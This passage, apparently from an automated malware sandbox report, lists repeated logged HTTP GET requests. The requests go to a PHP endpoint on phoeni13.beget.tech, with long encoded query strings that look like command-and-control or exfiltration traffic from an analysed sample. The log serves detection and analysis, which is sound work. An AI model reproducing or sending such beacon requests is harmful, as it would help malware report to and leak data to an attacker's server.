3VaBTNXN1bBlWZJRWRJdXUqxUeBNUUnFERNJTWElkVCFTUnlEVL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTt0QkVUS4d2QJVlUsZVUaxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETp1kaNVTS61UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiczYyYzNkdTM1E2N2MjNlJWYyQzMiFWYzgzN2UTYkVGMiwiI2MmYlFDOiR2NwEzN5UjM3MTZxIDM4kzNlNzM1QDOyYzM1EmZyMWOxIiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.tech
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.tech
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.tech
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.tech
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjN